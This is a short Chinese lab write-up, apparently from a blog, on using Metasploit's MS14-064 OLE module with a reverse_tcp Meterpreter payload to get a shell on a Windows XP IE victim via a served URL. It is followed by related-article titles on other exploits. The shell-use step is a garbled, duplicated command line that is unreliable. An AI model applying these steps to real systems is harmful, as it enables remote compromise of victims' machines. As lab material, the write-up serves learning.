实验环境:kali linux、windows XP Professional SP3.

实验工具:metasploit framework

功能实现模块:use exploit/windows/brower/ms14_064_ole_code_execution

实验过程:

1.执行模块,查看参数配置,并且设置payload(set payload windows/meterpreter/reverse_tcp):

2.其他参数无需再配置,直接run就行。(如果端口LPORT被占用了,可以用set重新设置)

3.运行结果返回了一个url地址:http://192.168.1.24:8080/.在XP ie浏览器中执行该url地址:

成功获取shell

4.利用shell:

uuse exploit/windows/browser/ms14_064_ole_code_execution
use exploit/windows/browser/ms14_064_ole_code_executionse exploit/windows/browser/ms14_064_ole_code_execution

利用XP ie浏览器的漏洞获取shell相关推荐

  1. Hack The Box - Meta 利用Exiftool远程代码执行漏洞获取webshell,ImageMagrick命令执行漏洞横向提权,更改环境配置SUDO纵向提权

    Hack The Box - Meta Hack The Box开始使用流程看这篇 文章目录 Hack The Box - Meta 整体思路 1.Nmap扫描 2.Exiftool远程代码执行漏洞( ...

  2. linux栈溢出漏洞,PWN简单栈溢出漏洞获取shell | kTWO-个人博客

    摘要 本文讲述的是PWN中利用溢出漏洞来执行shell命令的方法教程,本文将以简单的小程序来作为演示,从分析程序到编写payload加以利用,其中还含有二进制程序的保护机制简介. 0x01 前言 经过 ...

  3. 利用WiFi Pineapple Nano渗透客户端获取SHELL

    前言: 前两篇文章介绍了The WiFi Pineapple Nano设备的一些主要功能模块,例如PineAP.SSLsplit和Ettercap等.今天给大家实际场景演示下如何利用Pineapple ...

  4. 网络安全kali之利用宏感染word文档获取shell

    首先将office 2016.zip上传到win7虚拟机上,解压后,安装一下office. ┌──(root

  5. 【XSS漏洞-06】XSS漏洞利用案例(浏览器劫持、会话劫持、GetShell)—基于神器beEF

    目录 1 案例简介 1.1 案例目的 1.2 案例环境 2 案例一:浏览器劫持 2.1 概述 2.2 案例步骤 3 案例二:会话劫持 3.1 概述 3.2 案例步骤 4 案例三:GetShell 4. ...

  6. Hack The Box - Catch 利用let chat API查询信息,Cachet配置泄露漏洞获取ssh登录密码,apk代码注入漏洞利用获取root权限

    Hack The Box-Catch Hack The Box开始使用流程看这篇 文章目录 Hack The Box-Catch 整体思路 1.Nmap扫描 2.apk文件信息收集 3.lets ch ...

  7. 【XSS漏洞07】基于神器beEF的XSS漏洞利用实验(浏览器劫持、会话劫持、GetShell)

    目录 1 实验简介 1.1 实验目的 1.2 实验环境 2 实验一:浏览器劫持 2.1 概述 2.2 实验步骤 3 实验二:会话劫持 3.1 概述 3.2 实验步骤 4 实验三:GetShell 4. ...

  8. 利用新云网站管理系统漏洞成功获取某大型书店Webshell

    利用新云网站管理系统漏洞成功获取某大型书店Webshell 声明:本文仅做安全技术研究,请勿用来做违法事! 通过本文可以学到: ①了解新云网站管理系统 ②利用新云网站管理系统存在的SQL注入漏洞.文件 ...

  9. 一则利用内核漏洞获取root权限的案例【转】

    转自:https://blog.csdn.net/u014089131/article/details/73933649 目录(?)[-] 漏洞描述 漏洞的影响范围 漏洞曝光时间 漏洞产生的原因 漏洞 ...

最新文章

  1. Unity3D 深度图
  2. ​内核调试技巧--systemtap定位丢包原因
  3. ic5141运行出现cannot compile ahdlcmi module解决方案
  4. OpenGL 开发环境配置
  5. springboot超级详细的日志配置(基于logback)
  6. Android NDK开发篇(四):Java与原生代码通信(原生方法声明与定义与数据类型)
  7. 可用性测试的权衡之道
  8. uni-app登录+记住密码
  9. 期末数据结构复习的一点笔记
  10. 【随机过程】随机过程之更新过程(1)
  11. linux嵌入式面试300问,经典嵌入式Linux面试题3问
  12. 2020-04-03-功能性光学脑成像
  13. sqrt函数用法c语言 linux,C语言中sqrt函数如何使用
  14. python 封包发包_python中封包建立过程实例
  15. 计算机硬件的五大部分由谁提出,存储程序原理是由谁于1946年提出的,它明确了计算机硬件组成的五大部分() - 问答库...
  16. MySql中数据表增加字段很慢
  17. C++中的swap(交换函数)
  18. 社区版pyCharm创建Django项目
  19. 都2021年了,为什么想回看5分钟前写的代码就这么难
  20. 计算轮廓的特征参数(周长、面积、圆形度、周径比等)

热门文章

  1. android textview 字体阴影,TextView文字加阴影效果
  2. SpringBoot 整合Jest
  3. 三个自定义图标设置,让你的iPhone可爱亿点点!
  4. 甘肃政协委员:用对“领头羊”破乡村空壳合作社
  5. 史上最强C语言教程----程序的编译与预处理(1)
  6. 520发送的”我爱你“在传输时咋没变成”我恨你“?计算机网络(三)之数据链路层
  7. ZEMAX | 在 OpticStudio 中使用自由曲面进行设计
  8. android渠道包加固,Android多渠道打包和加固那些事
  9. 屏幕录制下载安装?这3个软件,亲测好用
  10. 项目(2)——注释转换工具